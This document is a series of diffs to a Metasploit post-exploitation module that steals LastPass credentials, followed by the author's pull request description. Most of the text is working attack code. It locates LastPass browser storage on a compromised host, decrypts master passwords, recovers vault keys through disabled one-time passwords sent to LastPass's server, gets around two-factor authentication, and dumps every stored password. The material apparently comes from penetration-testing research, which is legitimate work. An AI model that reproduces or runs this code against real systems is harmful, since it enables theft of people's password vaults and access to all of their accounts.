 
     print_lastpass_data(account_map)
   end
@@ -80,7 +80,7 @@ class Metasploit3 < Msf::Post
         }
         localstorage_path_map = {
           'Chrome' => "#{user_profile['LocalAppData']}\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0.localstorage",
-          'Firefox' => "#{user_profile['LocalAppData']}\\LastPass",
+          'Firefox' => "#{user_profile['LocalAppData']}Low\\LastPass",
           'Opera' => "#{user_profile['AppData']}\\Opera Software\\Opera Stable\\Local Storage\\chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0.localstorage",
           'Safari' => "#{user_profile['LocalAppData']}\\Apple Computer\\Safari\\LocalStorage\\safari-extension_com.lastpass.lpsafariextension-n24rep3bmn_0.localstorage"
         }
@@ -238,7 +238,7 @@ class Metasploit3 < Msf::Post
         creds_per_user = encoded_creds.split("|")
         creds_per_user.each do |user_creds|
           parts = user_creds.split('=')
-          for creds in credentials # Check if we have the username already
+          for creds in credentials # Check iuf we have the username already
             if creds[0] == parts[0]
               creds[1] = parts[1] # Add the password to the existing username
             else
@@ -256,9 +256,7 @@ class Metasploit3 < Msf::Post
 
 
   def decrypt_data(key, encrypted_data)
-    return if encrypted_data.blank?
-
-    decrypted_data = "DECRYPTION_ERROR"
+    return nil if encrypted_data.blank?
 
     if encrypted_data.include?("|") # Use CBC
       decipher = OpenSSL::Cipher.new("AES-256-CBC")
@@ -300,12 +298,12 @@ class Metasploit3 < Msf::Post
             unless ffcreds.blank?
               ffcreds.each do |creds|
                 if creds[1].blank?
-                  creds[1] = "NOT_FOUND"
+                  creds[1] = nil # No master password found
                 else
                   sha256_hex_email = OpenSSL::Digest::SHA256.hexdigest(URI.unescape(creds[0]))
                   sha256_binary_email = [sha256_hex_email].pack "H*" # Do hex2bin
                   creds[1] = decrypt_data(sha256_binary_email, URI.unescape(creds[1]))
-                  account_map[account][browser]['lp_creds'][creds[0]] = {'lp_password' => creds[1]}
+                  account_map[account][browser]['lp_creds'][URI.unescape(creds[0])] = {'lp_password' => creds[1]}
                 end
               end
             end
@@ -333,14 +331,10 @@ class Metasploit3 < Msf::Post
 
             for row in result
               if row[0]
-                if row[1].blank?
-                  row[1] = "NOT_FOUND"
-                else
-                  sha256_hex_email = OpenSSL::Digest::SHA256.hexdigest(row[0])
-                  sha256_binary_email = [sha256_hex_email].pack "H*" # Do hex2bin
-                  row[1] = decrypt_data(sha256_binary_email, row[1])
-                  account_map[account][browser]['lp_creds'][row[0]] = {'lp_password' => row[1]}
-                end
+                sha256_hex_email = OpenSSL::Digest::SHA256.hexdigest(row[0])
+                sha256_binary_email = [sha256_hex_email].pack "H*" # Do hex2bin
+                row[1].blank? ? row[1] = nil : row[1] = decrypt_data(sha256_binary_email, row[1]) # Decrypt master password
+                account_map[account][browser]['lp_creds'][row[0]] = {'lp_password' => row[1]}
               end
             end
           end
@@ -355,22 +349,18 @@ class Metasploit3 < Msf::Post
     account_map.each_pair do |account, browser_map|
       browser_map.each_pair do |browser, lp_data|
         if browser == 'Firefox'
-          lastpass_data[account][browser].each_pair do |username, user_data|
-            path = path + client.fs.file.separator + "lp.suid"
-            data = read_file(path) if client.fs.file.exists?(path) #Read file if it exists
-            data = "DECRYPTION_ERROR" if (data.blank? || data.size != 32) # Verify content
-            loot_path = store_loot(
-              'firefox.preferences',
-              'text/binary',
-              session,
-              data,
-              nil,
-              "Firefox 2FA token file #{path}"
-            )
-            lastpass_data[account][browser][username] << data
-
-          end
-          
+          path = lp_data['localstorage_db'] + client.fs.file.separator + "lp.suid"
+          data = read_file(path) if client.fs.file.exists?(path) #Read file if it exists
+          data = nil if (data.blank? || data.size != 32) # Verify content
+          loot_path = store_loot(
+            'firefox.preferences',
+            'text/binary',
+            session,
+            data,
+            nil,
+            "Firefox 2FA token file #{path}"
+          )
+          account_map[account][browser]['lp_2fa'] = data          
         else # Chrome, Safari and Opera
           data = read_file(lp_data['localstorage_db'])
           loot_path = store_loot(
@@ -389,7 +379,7 @@ class Metasploit3 < Msf::Post
             "WHERE key = 'lp.uid';"
           ).flatten
 
-          token.blank? ? account_map[account][browser]['lp_2fa'] = "NOT_FOUND" : account_map[account][browser]['lp_2fa'] = token.pack('H*')
+          token.blank? ? account_map[account][browser]['lp_2fa'] = nil : account_map[account][browser]['lp_2fa'] = token.pack('H*')
         end
       end
     end
@@ -431,10 +421,30 @@ class Metasploit3 < Msf::Post
       browser_map.each_pair do |browser, lp_data|
         lp_data['lp_creds'].each_pair do |username, user_data|
           if browser == 'Firefox'
-            path = firefox_map[account][browser] + client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_key.itr"
-            data = read_file(path) if client.fs.file.exists?(path) #Read file if it exists
-            data = "NOT FOUND" if data.blank? # Verify content
-            lastpass_data[account][browser][username] << data
+            path = lp_data['localstorage_db'] + client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_key.itr"
+            iterations = read_file(path) if client.fs.file.exists?(path) #Read file if it exists
+            iterations = "NOT FOUND" if iterations.blank? # Verify content
+            lp_data['lp_creds'][username]['iterations'] = iterations
+            loot_path = store_loot(
+              "#{browser.downcase}.lastpass.iterations",
+              'text/plain',
+              session,
+              iterations,
+              nil,
+              "#{account}'s #{browser} LastPass iterations"
+            )
+            path = lp_data['localstorage_db'] + client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_lps.act.sxml"
+            vault = read_file(path) if client.fs.file.exists?(path) #Read file if it exists
+            vault = "NOT FOUND" if vault.blank? # Verify content
+            lp_data['lp_creds'][username]['vault_loot'] = "NOT_FOUND"
+            loot_path = store_loot(
+              "#{browser.downcase}.lastpass.vault",
+              'text/plain',
+              session,
+              vault,
+              nil,
+              "#{account}'s #{browser} LastPass Vault"
+            )
 
           else # Chrome, Safari and Opera
             db = SQLite3::Database.new(lp_data['lp_db_loot'])
@@ -447,12 +457,12 @@ class Metasploit3 < Msf::Post
               if  /iterations=(?<iterations>.*);(?<vault>.*)/ =~ result[0][0]
                 lp_data['lp_creds'][username]['iterations'] = iterations
                 loot_path = store_loot(
-                  "#{browser.downcase}.lastpass.vault",
+                  "#{browser.downcase}.lastpass.iterations",
                   'text/plain',
                   session,
                   vault,
                   nil,
-                  "#{account}'s #{browser} LastPass Vault #{lp_data['lp_db_loot']}"
+                  "#{account}'s #{browser} LastPass iterations"
                 )
                 lp_data['lp_creds'][username]['vault_loot'] = loot_path
               else
@@ -463,7 +473,7 @@ class Metasploit3 < Msf::Post
                   session,
                   result[0][0],
                   nil,
-                  "#{account}'s #{browser} LastPass Vault #{lp_data['lp_db_loot']}"
+                  "#{account}'s #{browser} LastPass Vault"
                 )
                 lp_data['lp_creds'][username]['vault_loot'] = loot_path
               end
@@ -477,51 +487,54 @@ class Metasploit3 < Msf::Post
     end
   end
 
-
   def extract_vault_keys(account_map)
     account_map.each_pair do |account, browser_map|
       browser_map.each_pair do |browser, lp_data|
         lp_data['lp_creds'].each_pair do |username, user_data|
-          otp = extract_otp(account, browser, username, lp_data['lp_db_loot'])
-          lp_data['lp_creds'][username]['vault_key'] = decrypt_vault_key_with_otp(username, otp)
+          if !user_data['lp_password'].blank? && user_data['iterations'] != "NOT_FOUND"# Derive vault key from credentials
+            lp_data['lp_creds'][username]['vault_key'] = derive_vault_key_from_creds(username, lp_data['lp_creds'][username]['lp_password'], user_data['iterations'])
+          else # Get vault key from disabled OTP
+            otp = extract_otp(account, browser, username, lp_data)
+            lp_data['lp_creds'][username]['vault_key'] = decrypt_vault_key_with_otp(username, otp)
+          end
         end
       end
     end
   end
 
   # Returns otp, encrypted_key
-  def extract_otp(account, browser, username, path)    
+  def extract_otp(account, browser, username, lp_data)    
     if browser == 'Firefox'
-      path = firefox_map[account][browser] + client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_ff.sotp"
+      path = lp_data['localstorage_db'] + client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_ff.sotp"
       otp = read_file(path) if client.fs.file.exists?(path) #Read file if it exists
       otp = "NOT FOUND" if otp.blank? # Verify content
       return otp 
     else # Chrome, Safari and Opera
-      db = SQLite3::Database.new(path)
+      db = SQLite3::Database.new(lp_data['lp_db_loot'])
       result = db.execute(
         "SELECT type, data FROM LastPassData " \
         "WHERE username_hash = '"+OpenSSL::Digest::SHA256.hexdigest(username)+"' AND type = 'otp'"
       )
-      return result[0][1]
+      result[0][1]
     end
   end
 
 
-  def make_vault_key_from_creds username, password, key_iteration_count
+  def derive_vault_key_from_creds username, password, key_iteration_count
     if key_iteration_count == 1
         key = Digest::SHA256.hexdigest username + password
     else
-        key = pbkdf2(password, username, key_iteration_count, 32)
+        key = pbkdf2(password, username, key_iteration_count.to_i, 32)
     end
     
-    return key
+    key.first
   end
 
   def decrypt_vault_key_with_otp username, otp
     otpbin = [otp].pack "H*"
     vault_key_decryption_key = [lastpass_sha256(username + otpbin)].pack "H*"
     encrypted_vault_key = retrieve_encrypted_vault_key_with_otp(username, otp)
-    return decrypt_data(vault_key_decryption_key, encrypted_vault_key)
+    decrypt_data(vault_key_decryption_key, encrypted_vault_key)
   end
 
   def retrieve_encrypted_vault_key_with_otp username, otp
@@ -538,13 +551,17 @@ class Metasploit3 < Msf::Post
       http.request(request)
     }
 
+    puts request.body
+    puts response.body
+
+
     # Parse response
     encrypted_vault_key = nil
     if response.body.match(/randkey\="(.*)"/)
       encrypted_vault_key = response.body.match(/randkey\="(.*)"/)[1]
     end
 
-    return encrypted_vault_key
+    encrypted_vault_key
   end
 
   # LastPass does some preprocessing (UTF8) when doing a SHA256 on special chars (binary)
@@ -567,13 +584,13 @@ class Metasploit3 < Msf::Post
       end
     end
 
-    return OpenSSL::Digest::SHA256.hexdigest(output)
+    OpenSSL::Digest::SHA256.hexdigest(output)
   end
 
 
   def pbkdf2(password, salt, iterations, key_length)
     digest = OpenSSL::Digest::SHA256.new
-    return OpenSSL::PKCS5.pbkdf2_hmac(password, salt, iterations, key_length, digest).unpack 'H*'
+    OpenSSL::PKCS5.pbkdf2_hmac(password, salt, iterations, key_length, digest).unpack 'H*'
   end 
 
 

--- a/modules/post/multi/gather/lastpass_creds.rb
+++ b/modules/post/multi/gather/lastpass_creds.rb
@@ -416,7 +416,7 @@ class Metasploit3 < Msf::Post
             db = SQLite3::Database.new(lp_data['lp_db_loot'])
             result = db.execute(
               "SELECT data FROM LastPassData " \
-              "WHERE username_hash = '" + OpenSSL::Digest::SHA256.hexdigest(username) + "' AND type = 'accts'"
+              "WHERE username_hash = ? AND type = 'accts'", OpenSSL::Digest::SHA256.hexdigest(username)
             )
 
             if result.size == 1 && !result[0].blank?
@@ -556,7 +556,7 @@ class Metasploit3 < Msf::Post
       db = SQLite3::Database.new(lp_data['lp_db_loot'])
       result = db.execute(
         "SELECT type, data FROM LastPassData " \
-        "WHERE username_hash = '" + OpenSSL::Digest::SHA256.hexdigest(username) + "' AND type = 'otp'"
+        "WHERE username_hash = ? AND type = 'otp'", OpenSSL::Digest::SHA256.hexdigest(username)
       )
       return (result.blank? || result[0][1].blank?) ? nil : [result[0][1]].pack("H*")
     end
@@ -779,7 +779,7 @@ class Metasploit3 < Msf::Post
       db = SQLite3::Database.new(lp_data['lp_db_loot'])
       result = db.execute(
         "SELECT data FROM LastPassData " \
-        "WHERE username_hash = '" + OpenSSL::Digest::SHA256.hexdigest(username) + "' AND type = 'key'"
+        "WHERE username_hash = ? AND type = 'key'", OpenSSL::Digest::SHA256.hexdigest(username)
       )
       encrypted_vault_key = result[0][0]
     end

--- a/modules/post/multi/gather/lastpass_creds.rb
+++ b/modules/post/multi/gather/lastpass_creds.rb
@@ -171,7 +171,7 @@ class Metasploit3 < Msf::Post
     user_profiles = []
     case session.platform
     when /unix|linux/
-      user_names = directory_entries("/home")
+      user_names = dir("/home")
       user_names.reject! { |u| %w(. ..).include?(u) }
       user_names.each do |user_name|
         user_profiles.push('UserName' => user_name, "LocalAppData" => "/home/#{user_name}")
@@ -199,7 +199,7 @@ class Metasploit3 < Msf::Post
     found_dbs_paths = []
 
     files = []
-    files = directory_entries(path) if directory?(path)
+    files = dir(path) if directory?(path)
     files.each do |file_path|
       unless %w(. .. Shared).include?(file_path)
         found_dbs_paths.push([path, file_path].join(system_separator))
@@ -214,7 +214,7 @@ class Metasploit3 < Msf::Post
     found_dbs_paths = []
 
     if directory?(path)
-      files = directory_entries(path)
+      files = dir(path)
       files.reject! { |file| %w(. ..).include?(file) }
       files.each do |file_path|
         found_dbs_paths.push([path, file_path, 'prefs.js'].join(system_separator)) if file_path.match(/.*\.default/)
@@ -467,7 +467,7 @@ class Metasploit3 < Msf::Post
 
     browser_map.each_pair do |browser, lp_data|
       if browser == "IE"
-        cookies_files = directory_entries(lp_data['cookies_db'])
+        cookies_files = dir(lp_data['cookies_db'])
         cookies_files.reject! { |u| %w(. ..).include?(u) }
         cookies_files.each do |cookie_jar_file|
           data = read_remote_file(lp_data['cookies_db'] + system_separator + cookie_jar_file)
@@ -790,19 +790,5 @@ class Metasploit3 < Msf::Post
   # Returns OS separator in a session type agnostic way
   def system_separator
     return session.platform =~ /win/ ? '\\' : '/'
-  end
-
-  # Return directory content in a session type agnostic way
-  def directory_entries(path)
-    if directory?(path)
-      if session.type == "meterpreter"
-        return client.fs.dir.entries(path)
-      elsif session.type == "shell"
-        return session.shell_command("ls \"#{path}\"").split
-      else
-        print_error "Session type not recognized: #{session.type}"
-        return nil
-      end
-    end
   end
 end

--- a/modules/post/multi/gather/lastpass_creds.rb
+++ b/modules/post/multi/gather/lastpass_creds.rb
@@ -373,13 +373,13 @@ class Metasploit3 < Msf::Post
     lastpass_data_table = Rex::Ui::Text::Table.new(
       'Header' => "LastPass Accounts",
       'Indent' => 1,
-      'Columns' => %w(Account Browser LP_Username LP_Password LP_2FA LP_Key)
+      'Columns' => %w(Account LP_Username LP_Password LP_2FA LP_Key)
     )
 
     account_map.each_pair do |account, browser_map|
       browser_map.each_pair do |browser, lp_data|
         lp_data['lp_creds'].each_pair do |username, user_data|
-          lastpass_data_table << [account, browser, username, user_data['lp_password'], lp_data['lp_2fa'], user_data['vault_key']]
+          lastpass_data_table << [account, username, user_data['lp_password'], lp_data['lp_2fa'], user_data['vault_key']]
         end
       end
     end

--- a/modules/post/multi/gather/lastpass_creds.rb
+++ b/modules/post/multi/gather/lastpass_creds.rb
@@ -697,12 +697,17 @@ class Metasploit3 < Msf::Post
     labels = ["name", "folder", "url", "notes", "undefined", "undefined2", "username", "password"]
     vault_data = []
     for label in labels
-      length = chunk[pointer..pointer + 3].unpack("H*").first.to_i(16)
-      encrypted_data = chunk[pointer + 4..pointer + 4 + length - 1]
-      label != "url" ? decrypted_data = decrypt_vault_password(vault_key, encrypted_data) : decrypted_data = [encrypted_data].pack("H*")
-      decrypted_data = "" if decrypted_data.nil?
-      vault_data << decrypted_data if (label == "url" || label == "username" || label == "password")
-      pointer = pointer + 4 + length
+      begin
+        length = chunk[pointer..pointer + 3].unpack("H*").first.to_i(16)
+        encrypted_data = chunk[pointer + 4..pointer + 4 + length - 1]
+        label != "url" ? decrypted_data = decrypt_vault_password(vault_key, encrypted_data) : decrypted_data = [encrypted_data].pack("H*")
+        decrypted_data = "" if decrypted_data.nil?
+        vault_data << decrypted_data if (label == "url" || label == "username" || label == "password")
+        pointer = pointer + 4 + length
+      rescue
+        vprint_error "Vault account could not be parsed"
+        return nil
+      end
     end
     return vault_data[0] == "http://sn" ? nil : vault_data # TODO: Support secure notes
   end


### PR DESCRIPTION
I continued the research on LastPass and found new attack vectors that I presented at Blackhat EU. Check the details here: http://www.martinvigo.com/even-the-lastpass-will-be-stolen-deal-with-it/

The new features added are:
- Support for vault decryption with cookies
- Support for vault decryption with disabled OTPs
- Support for IE
- Supports the new way credentials are stored in Firefox
- Support for the binary version of the plugins in Windows
- The module helps bypass 2FA
- The module now decrypts the vault automatically and prints all passwords

The setup for a testing environment is easy. All that is needed are browsers with the plugin installed. Please note that LastPass allows for some browsers/OS a "binary option". Binary version in MAC is not supported. The reason is that the binary option takes advantage of the OS encryption mechanism (keychain in MAC for example) and that cannot be decrypted.

In order to test the vault decryption with cookies you must be logged in to have an valid session cookie. To test the vault decryption with OTPs you must initiate the account recovery process.

The module only takes one parameter, the session id. And it works for both, meterpreter and shell sessions.
